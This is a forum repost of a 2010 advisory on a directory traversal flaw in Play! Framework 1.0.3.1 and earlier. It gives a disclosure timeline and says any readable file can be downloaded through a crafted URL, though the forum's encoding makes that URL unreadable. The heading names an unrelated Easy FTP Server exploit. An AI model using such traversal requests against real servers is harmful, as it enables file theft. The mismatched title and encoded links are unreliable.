-
-
[转帖]# Exploit Title: Easy FTP Server v1.7.0.11 NLST , NLST -al, APPE, RETR , SIZE an
-
发表于:
2010-8-11 12:09
3746
-
[转帖]# Exploit Title: Easy FTP Server v1.7.0.11 NLST , NLST -al, APPE, RETR , SIZE an
Exploit Title: Play! Framework <= 1.0.3.1 Directory Transversal Vulnerability
Date: July 24, 2010
Author: kripthor
Software Link:
8a5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4m8D9j5i4W2X3M7X3q4E0k6i4N6G2M7X3E0Q4x3X3g2G2M7X3N6Q4x3V1k6Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.
Version: Play! Framework <= 1.0.3.1
Tested on: Ubuntu 10
CVE : N/A
Notes: 28/07/2010 at 14:03 - Developer contacted
28/07/2010 at 15:04 - Fix released
10/08/2010 at 17:00 - Exploit published
References:
5c7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4m8D9j5i4W2X3M7X3q4E0k6i4N6G2M7X3E0Q4x3X3g2U0L8$3#2Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.
An attacker can download any file that the owner of the Play! process can read.
Simply browse to:
845K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9K6b7e0V1H3x3o6m8Q4x3V1k6H3N6h3u0D9K9h3y4Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3U0f1J5k6W2)9J5k6g2)9J5k6g2)9J5y4e0u0X3i4K6u0W2i4K6u0W2i4K6t1#2x3X3k6Q4x3X3g2Q4x3X3g2Q4x3U0f1J5k6W2)9J5k6g2)9J5k6g2)9J5y4e0u0X3i4K6u0W2i4K6u0W2i4K6t1#2x3X3k6Q4x3X3g2Q4x3X3g2Q4x3U0f1J5k6W2)9J5k6g2)9J5k6g2)9J5y4e0u0X3k6i4c8U0i4K6t1#2x3X3k6H3j5i4y4K6N6$3c8Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.
The '/public' directory must be a directory with a 'staticDir' mapping in the 'conf/routes' configuration file.
Typically an images or css directory on the server.
[培训]科锐软件逆向54期预科班、正式班开始火爆招生报名啦!!!
